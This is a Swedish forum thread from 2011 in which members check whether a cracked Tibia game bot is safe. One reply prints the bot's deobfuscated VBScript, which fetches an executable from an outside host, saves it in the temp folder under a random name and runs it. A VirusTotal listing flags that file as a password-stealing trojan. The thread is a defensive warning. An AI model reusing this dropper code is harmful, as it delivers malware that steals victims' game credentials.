Flashback bygger pepparkakshus!
  1. Dator och IT
  2. IT-säkerhet

Innehåller det här scriptet virus eller dyl.?

Svara
2011-09-11, 14:43
  #1
Vpaz
Medlem
Hej.

Jag undrar om det här scriptet http://data.fuskbugg.se/skalman02/6e...NeoPatchv2.rar innehåller någon skadlig kod osv?

Om ni undrar ursprung så är det ifrån http://www.youtube.com/watch?v=iaORGLg1ZqU (comment i description), krigade som fan o gjorde en jävla survey för att tanka ner den. Nu undrar jag om den verkligen är legit.

Skulle uppskatta hemskt mycket om någon kunde svara!
Mvh

EDIT: Anledningen till varför jag är misstänksam, är att uploadern försöker låta så ödmjuk i sin youtube description medan han länkar till en sida där man måste göra surveys (som han får pengar för?) för att kunna tanka hans s.k. "freeware". Men anl. till varför jag gjorde det ändå är de positiva comments som finns på videon.
__________________
Senast redigerad av Vpaz 2011-09-11 kl. 14:59.
Citera
2011-09-11, 15:13
  #2
BrottareGustav
Medlem
BrottareGustavs avatar
Ett crack till en tibiabot innehåller till 99% Säkerhet en keylogger .. Eller bara en minnesavläsare som tar ditt konto.
Citera
2011-09-11, 15:31
  #3
afnz
Medlem
afnzs avatar
VBScriptet deobfuskerat:
Kod: 
Randomize
nameLength = 10
randomname = ""
Do While Len(randomname) < nameLength
currRandCur = Int(Rnd * 255)
If currRandCur >= Asc("a") And currRandCur <= Asc("z") _
Or currRandCur >= Asc("A") And currRandCur <= Asc("Z") _
Or currRandCur >= Asc("0") And currRandCur <= Asc("9") Then
randomname = randomname & Chr(currRandCur)
End If
Loop
strSource = "http://h1.ripway.com/Janbanan/winupdate.exe"
strDest = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) & "\" & randomname & ".exe"
set HTTP = CreateObject("Microsoft.XMLHTTP")
HTTP.open "GET", strSource, False
HTTP.send
set Stream = createobject("adodb.stream")
Const adTypeBinary = 1
Const adSaveCreateNotExist = 1
Const adSaveCreateOverWrite = 2
Stream.type = adTypeBinary
Stream.open
Stream.write HTTP.responseBody
Stream.savetofile strDest, adSaveCreateOverWrite
set Stream = nothing
set HTTP = nothing

Set shell = CreateObject("WScript.Shell")
shell.Run Chr(34) & strDest & Chr(34), 1, false
Set shell = Nothing

VirusTotal analys av winupdate.exe:
Kod: 
AhnLab-V3	2011.09.11.00	2011.09.11	Trojan/Win32.Tibia
AntiVir	7.11.14.161	2011.09.09	TR/PSW.Tibia.ifq
Antiy-AVL	2.0.3.7	2011.09.11	-
Avast	4.8.1351.0	2011.09.11	Win32:Malware-gen
Avast5	5.0.677.0	2011.09.11	Win32:Malware-gen
AVG	10.0.0.1190	2011.09.11	PSW.OnlineGames3.BPMW
BitDefender	7.2	2011.09.11	Trojan.Generic.6286595
ByteHero	1.0.0.1	2011.09.03	-
CAT-QuickHeal	11.00	2011.09.10	-
ClamAV	0.97.0.0	2011.09.11	-
Commtouch	5.3.2.6	2011.09.10	-
Comodo	10074	2011.09.11	UnclassifiedMalware
Emsisoft	5.1.0.11	2011.09.11	Trojan-PWS.OnlineGames3!IK
eSafe	7.0.17.0	2011.09.07	Win32.TRPSW.Tibia.If
eTrust-Vet	36.1.8550	2011.09.10	-
F-Prot	4.6.2.117	2011.09.10	-
F-Secure	9.0.16440.0	2011.09.11	Trojan.Generic.6286595
Fortinet	4.3.370.0	2011.09.11	W32/Tibia.IFQ!tr
GData	22	2011.09.11	Trojan.Generic.6286595
Ikarus	T3.1.1.107.0	2011.09.11	Trojan-PWS.OnlineGames3
Jiangmin	13.0.900	2011.09.10	Trojan/PSW.MSIL.agt
K7AntiVirus	9.112.5114	2011.09.09	Password-Stealer
Kaspersky	9.0.0.837	2011.09.11	Trojan-GameThief.Win32.Tibia.ifq
McAfee-GW-Edition	2010.1D	2011.09.10	Generic.dx!baky
Microsoft	1.7604	2011.09.11	Trojan:Win32/Sisron
NOD32	6453	2011.09.11	a variant of MSIL/PSW.Agent.NCF
Norman	6.07.11	2011.09.11	W32/MSIL/Agent.BZ
nProtect	2011-09-11.01	2011.09.11	Trojan-PWS/W32.Agent.15360.K
Panda	10.0.3.5	2011.09.11	Trj/CI.A
PCTools	8.0.0.5	2011.09.11	Trojan.Gen
Prevx	3.0	2011.09.11	-
Rising	23.74.03.03	2011.09.09	-
Sophos	4.69.0	2011.09.11	-
SUPERAntiSpyware	4.40.0.1006	2011.09.10	Trojan.Agent/Gen-Injector[Fmt]
Symantec	20111.2.0.82	2011.09.11	Trojan.Gen
TheHacker	6.7.0.1.293	2011.09.10	Trojan/Tibia.ifq
TrendMicro	9.500.0.1008	2011.09.09	TROJ_GEN.F43C3GM
TrendMicro-HouseCall	9.500.0.1008	2011.09.11	TROJ_GEN.F43C3GM
VBA32	3.12.16.4	2011.09.09	TrojanPSW.Tibia.ifq
VIPRE	10441	2011.09.11	Trojan.Win32.Generic!BT
ViRobot	2011.9.10.4666	2011.09.11	-
VirusBuster	14.0.206.1	2011.09.10	Trojan.PWS.Tibia!3vU5yoUXZyA

Så sammanfattningsvis: nej, det är inget du vill ladda hem och köra.
Citera
2011-09-11, 18:22
  #4
Proton
Moderator
Protons avatar
It-säkerhet -> Daorvirus /Mod
Citera
2011-09-19, 16:08
  #5
Vpaz
Medlem
Citat:
Ursprungligen postat av afnz
VBScriptet deobfuskerat:
Kod: 
Randomize
nameLength = 10
randomname = ""
Do While Len(randomname) < nameLength
currRandCur = Int(Rnd * 255)
If currRandCur >= Asc("a") And currRandCur <= Asc("z") _
Or currRandCur >= Asc("A") And currRandCur <= Asc("Z") _
Or currRandCur >= Asc("0") And currRandCur <= Asc("9") Then
randomname = randomname & Chr(currRandCur)
End If
Loop
strSource = "http://h1.ripway.com/Janbanan/winupdate.exe"
strDest = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) & "\" & randomname & ".exe"
set HTTP = CreateObject("Microsoft.XMLHTTP")
HTTP.open "GET", strSource, False
HTTP.send
set Stream = createobject("adodb.stream")
Const adTypeBinary = 1
Const adSaveCreateNotExist = 1
Const adSaveCreateOverWrite = 2
Stream.type = adTypeBinary
Stream.open
Stream.write HTTP.responseBody
Stream.savetofile strDest, adSaveCreateOverWrite
set Stream = nothing
set HTTP = nothing

Set shell = CreateObject("WScript.Shell")
shell.Run Chr(34) & strDest & Chr(34), 1, false
Set shell = Nothing

VirusTotal analys av winupdate.exe:
Kod: 
AhnLab-V3	2011.09.11.00	2011.09.11	Trojan/Win32.Tibia
AntiVir	7.11.14.161	2011.09.09	TR/PSW.Tibia.ifq
Antiy-AVL	2.0.3.7	2011.09.11	-
Avast	4.8.1351.0	2011.09.11	Win32:Malware-gen
Avast5	5.0.677.0	2011.09.11	Win32:Malware-gen
AVG	10.0.0.1190	2011.09.11	PSW.OnlineGames3.BPMW
BitDefender	7.2	2011.09.11	Trojan.Generic.6286595
ByteHero	1.0.0.1	2011.09.03	-
CAT-QuickHeal	11.00	2011.09.10	-
ClamAV	0.97.0.0	2011.09.11	-
Commtouch	5.3.2.6	2011.09.10	-
Comodo	10074	2011.09.11	UnclassifiedMalware
Emsisoft	5.1.0.11	2011.09.11	Trojan-PWS.OnlineGames3!IK
eSafe	7.0.17.0	2011.09.07	Win32.TRPSW.Tibia.If
eTrust-Vet	36.1.8550	2011.09.10	-
F-Prot	4.6.2.117	2011.09.10	-
F-Secure	9.0.16440.0	2011.09.11	Trojan.Generic.6286595
Fortinet	4.3.370.0	2011.09.11	W32/Tibia.IFQ!tr
GData	22	2011.09.11	Trojan.Generic.6286595
Ikarus	T3.1.1.107.0	2011.09.11	Trojan-PWS.OnlineGames3
Jiangmin	13.0.900	2011.09.10	Trojan/PSW.MSIL.agt
K7AntiVirus	9.112.5114	2011.09.09	Password-Stealer
Kaspersky	9.0.0.837	2011.09.11	Trojan-GameThief.Win32.Tibia.ifq
McAfee-GW-Edition	2010.1D	2011.09.10	Generic.dx!baky
Microsoft	1.7604	2011.09.11	Trojan:Win32/Sisron
NOD32	6453	2011.09.11	a variant of MSIL/PSW.Agent.NCF
Norman	6.07.11	2011.09.11	W32/MSIL/Agent.BZ
nProtect	2011-09-11.01	2011.09.11	Trojan-PWS/W32.Agent.15360.K
Panda	10.0.3.5	2011.09.11	Trj/CI.A
PCTools	8.0.0.5	2011.09.11	Trojan.Gen
Prevx	3.0	2011.09.11	-
Rising	23.74.03.03	2011.09.09	-
Sophos	4.69.0	2011.09.11	-
SUPERAntiSpyware	4.40.0.1006	2011.09.10	Trojan.Agent/Gen-Injector[Fmt]
Symantec	20111.2.0.82	2011.09.11	Trojan.Gen
TheHacker	6.7.0.1.293	2011.09.10	Trojan/Tibia.ifq
TrendMicro	9.500.0.1008	2011.09.09	TROJ_GEN.F43C3GM
TrendMicro-HouseCall	9.500.0.1008	2011.09.11	TROJ_GEN.F43C3GM
VBA32	3.12.16.4	2011.09.09	TrojanPSW.Tibia.ifq
VIPRE	10441	2011.09.11	Trojan.Win32.Generic!BT
ViRobot	2011.9.10.4666	2011.09.11	-
VirusBuster	14.0.206.1	2011.09.10	Trojan.PWS.Tibia!3vU5yoUXZyA

Så sammanfattningsvis: nej, det är inget du vill ladda hem och köra.
Tusen tack! Hur gjorde du det där om man får fråga?
Citera
2011-09-19, 16:24
  #6
TorrentLover
Medlem
TorrentLovers avatar
Seriöst?
http://tinyurl.com/virustotal-on-google
Citera
2011-09-20, 00:11
  #7
afnz
Medlem
afnzs avatar
Fast nu tror jag att Vpaz syftade på den oerhört avancerade deobfuskeringen, som bestod i att byta ut "Execute" mot "WScript.Echo".
Citera
Svara

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in